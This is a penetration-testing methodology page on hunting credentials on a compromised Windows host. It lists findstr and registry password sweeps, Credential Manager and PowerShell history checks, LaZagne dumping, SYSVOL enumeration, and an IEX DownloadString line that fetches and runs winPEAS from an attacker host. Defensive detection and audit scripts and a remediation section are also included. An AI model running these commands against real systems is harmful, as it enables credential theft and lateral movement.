🛡️ Methodology Checklist
- File search: findstr /SIM /C:"password" *.txt *.xml *.ini *.config 2>nul
- Registry creds: reg query HKLM /f password /t REG_SZ /s
- PowerShell history: (Get-PSReadLineOption).HistorySavePath
- Credential Manager: cmdkey /list
- Autologon: reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
- Unattend.xml: C:\Windows\Panther\Unattend.xml
- Chrome/Firefox saved passwords (requires user session)
- LaZagne: lazagne.exe all
🎯 Operational Context
Use when: Windows foothold obtained — hunt for credentials in registry, config files, credential manager, PowerShell history, and IIS web.config.
Think Dumber First: type C:\Users\[USER]\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt — PowerShell history is the Windows equivalent of bash_history. Run it immediately. Then check C:\inetpub\wwwroot\web.config for DB strings.
Skip when: Already have SYSTEM — dump LSASS directly instead of file hunting.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml | Search file contents for “password” keyword (case-insensitive, recursive) |
| findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml | Common config file variant |
| C:\Temp\lazagne.exe all | Run LaZagne — dump all stored credentials |
| C:\Temp\lazagne.exe all > C:\Temp\passwords.txt | LaZagne output to file |
| dir /s \\[DC_IP]\SYSVOL | List SYSVOL share contents (readable by all domain users) |
| xfreerdp3 /v:[TARGET_IP] /u:[USER] /p:[PASS] /drive:share,$(pwd) | RDP with drive share to transfer LaZagne |
| net use | List mapped network drives |
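The defender's view of the same table: an added detection example (not part of the original cheatsheet) that runs a few command-line rules over constructed process-creation records in the shape of event 4688 / Sysmon event 1 fields and alerts when one account trips several of them in sequence. The account names, IP and the Account=/CommandLine= line format are constructed sample data.

```powershell
# Added detection example, not from the original cheatsheet.
# Input lines are constructed samples shaped like 4688 "Process Command Line"
# or Sysmon event 1 fields; the accounts and the 10.0.0.5 DC are made up.
$sampleEvents = @(
    'Account=CORP\jdoe CommandLine=findstr /SIM /C:"password" *.txt *.ini *.config *.xml',
    'Account=CORP\jdoe CommandLine=reg query HKLM /f password /t REG_SZ /s',
    'Account=CORP\jdoe CommandLine=cmdkey /list',
    'Account=CORP\jdoe CommandLine=dir /s \\10.0.0.5\SYSVOL',
    'Account=CORP\svc_iis CommandLine=C:\Temp\lazagne.exe all',
    'Account=CORP\alice CommandLine=findstr /S /I "TODO" *.cs'      # benign, must not match
)

# Each rule: a .NET regex over the command line plus the technique it indicates.
$rules = @(
    @{ Name = 'findstr keyword sweep for secrets';     Pattern = '(?i)\bfindstr\b.*\b(password|passw|pwd|secret|credential|token)\b' },
    @{ Name = 'registry search for password strings';  Pattern = '(?i)\breg(\.exe)?\s+query\b.*\s/f\s+\S*(password|pwd|cred)' },
    @{ Name = 'Credential Manager enumeration';        Pattern = '(?i)\bcmdkey(\.exe)?\s+/list\b' },
    @{ Name = 'LaZagne execution';                     Pattern = '(?i)\blazagne\S*\s+(all|browsers|windows|sysadmin)\b' },
    @{ Name = 'SYSVOL recursive listing';              Pattern = '(?i)\bdir\s+/s\s+\\\\\S+\\SYSVOL' },
    @{ Name = 'PSReadLine history access';             Pattern = '(?i)ConsoleHost_history\.txt|HistorySavePath' }
)

function Find-CredentialHunting {
    param([string[]]$Events)
    foreach ($e in $Events) {
        $account = if ($e -match 'Account=(\S+)') { $Matches[1] } else { '?' }
        $cmd = ($e -split 'CommandLine=', 2)[1]
        foreach ($r in $rules) {
            if ($cmd -match $r.Pattern) {
                [pscustomobject]@{ Account = $account; Rule = $r.Name; CommandLine = $cmd }
            }
        }
    }
}

# A single hit is noisy (admins run cmdkey /list too); several distinct rules
# from one account look like the checklist above being worked top to bottom.
Find-CredentialHunting -Events $sampleEvents |
    Group-Object Account |
    Where-Object { ($_.Group.Rule | Sort-Object -Unique).Count -ge 2 } |
    ForEach-Object { "ALERT $($_.Name): $(($_.Group.Rule | Sort-Object -Unique) -join '; ')" }
```

With the sample data only CORP\jdoe is reported (four distinct rules); svc_iis trips one rule and alice none.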
🔬 Deep Dive & Workflow
Search Strategy by User Role
Don’t search blindly — target locations based on the compromised account’s function:
| Role | High-Value Locations |
|---|---|
| IT Admin | RDP .rdp files, PuTTY sessions, WinSCP configs, KeePass .kdbx |
| Developer | web.config, .git dirs, API keys in source, connection strings |
| HR / Finance | Excel/Word files named “passwords”, “accounts”, “logins” |
findstr — Living-off-the-Land Search
Built into every Windows installation — no upload required:
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml
- /S — search subdirectories
- /I — case-insensitive
- /M — print filenames only (suppress matching lines for clean output)
Expand the keyword list for broader coverage:
password, passphrase, pwd, creds, credentials, dbpassword, dbcredential, login, key, secret, token
LaZagne — Automated Credential Extraction
LaZagne extracts stored credentials from browsers, Wi-Fi profiles, sysadmin tools (WinSCP, PuTTY, FileZilla), and memory.
Transfer via RDP drive share (no separate upload needed):
xfreerdp3 /v:[TARGET_IP] /u:[USER] /p:[PASS] /drive:share,$(pwd)
# File accessible at \\tsclient\share\lazagne.exe on target
Critical: Do NOT run with start LaZagne.exe — it opens a new window that closes instantly before output can be read. Run directly:
C:\Temp\lazagne.exe all
C:\Temp\lazagne.exe all > C:\Temp\passwords.txt
SYSVOL — Domain-Wide Readable Share
Every domain user can read SYSVOL on the Domain Controller. It contains Group Policy scripts and XML files that often have embedded credentials (historically from Group Policy Preferences):
dir /s \\[DC_IP]\SYSVOL
Also accessible via Explorer: \\[DC_IP]\SYSVOL
High-Value File Locations
| File | Path | Contains |
|---|---|---|
| web.config | C:\inetpub\wwwroot\ | DB connection strings |
| Unattend.xml | C:\Windows\Panther\ | Leftover install credentials |
| KeePass .kdbx | User profile dirs | Credential vaults |
| .rdp files | Desktop, Documents | Saved RDP sessions with credentials |
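An added audit script (not from the original cheatsheet) that walks the same exposure points from the defender's side, so they can be cleared before an attacker finds them: the Winlogon autologon value, Unattend.xml, every profile's PSReadLine history, and the expanded keyword list from the findstr section swept over the config paths in the table above. It assumes an elevated PowerShell on the audited host; the $SearchRoot defaults are constructed and the keyword list drops the very noisy "login" and "key".

```powershell
# Added audit example, not from the original cheatsheet. Run elevated on the
# host being audited; $SearchRoot is an assumed default, adjust to taste.
param(
    [string[]]$SearchRoot = @('C:\inetpub', 'C:\Users')
)

$findings = New-Object System.Collections.Generic.List[string]

# 1. Autologon: Winlogon keeps the account password in clear text in DefaultPassword.
$winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
$auto = Get-ItemProperty -Path $winlogon -ErrorAction SilentlyContinue
if ($auto.AutoAdminLogon -eq '1' -or $auto.DefaultPassword) {
    $findings.Add("Autologon configured for '$($auto.DefaultUserName)' with DefaultPassword set")
}

# 2. Leftover install answer files (Panther plus the Sysprep copy).
foreach ($f in 'C:\Windows\Panther\Unattend.xml', 'C:\Windows\Panther\Unattended.xml',
               'C:\Windows\System32\Sysprep\Unattend.xml') {
    if (Test-Path $f) { $findings.Add("Unattend file present: $f") }
}

# 3. PSReadLine history of every profile (the Windows bash_history).
Get-ChildItem 'C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt' -ErrorAction SilentlyContinue |
    Where-Object { Select-String -Path $_.FullName -Pattern 'password|passwd|pwd|secret' -Quiet } |
    ForEach-Object { $findings.Add("PowerShell history mentions a secret: $($_.FullName)") }

# 4. Keyword sweep over config files; case-insensitive like findstr /I, and
#    -List stops at the first hit per file, the equivalent of findstr /M.
$keywords = 'password|passphrase|pwd|creds|credentials|dbpassword|dbcredential|secret|token'
$exts = '*.txt', '*.ini', '*.cfg', '*.config', '*.xml', '*.ps1', '*.yml', '*.rdp'
Get-ChildItem -Path $SearchRoot -Include $exts -Recurse -File -ErrorAction SilentlyContinue |
    Select-String -Pattern $keywords -List |
    ForEach-Object { $findings.Add("Keyword '$($_.Matches[0].Value)' in $($_.Path):$($_.LineNumber)") }

if ($findings.Count -eq 0) { 'No plaintext-credential exposure found.' } else { $findings }
```

Each hit maps to a remediation line in the Reporting Trigger below: remove DefaultPassword and use LAPS, delete stale Unattend files, clear or disable history on shared hosts, and move connection strings out of plaintext config.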
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| PSReadLine history file not found | PowerShell history disabled or different path | Check: (Get-PSReadlineOption).HistorySavePath for actual path |
| reg query for passwords returns empty | Key doesn’t exist | Try broader: reg query HKLM /f password /t REG_SZ /s 2>nul (slow but thorough) |
| web.config access denied | IIS running as low-privilege | Check other config locations: C:\inetpub\wwwroot\web.config, C:\Windows\Microsoft.NET\Framework*\CONFIG\ |
| winpeas.exe detected by AV | Default signature | Run PowerShell version: IEX (New-Object Net.WebClient).DownloadString('http://[LHOST]/winPEASany.ps1') |
| Windows Credential Manager empty | No saved creds | Check for .rdp files: dir /s /b *.rdp 2>nul; also cmdkey /list for stored credentials |
📝 Reporting Trigger
Finding Title: Plaintext Credentials Found in Windows Credential Storage
Impact: Credentials stored in Windows Credential Manager, registry, PowerShell history, or configuration files allow privilege escalation and lateral movement without brute force or vulnerability exploitation.
Root Cause: Applications and users store credentials in easily accessible Windows credential storage mechanisms without encryption.
Recommendation: Implement Windows Credential Guard to protect stored credentials. Clear PowerShell history on shared systems. Use LAPS for local admin passwords. Audit Windows Credential Manager content on all systems.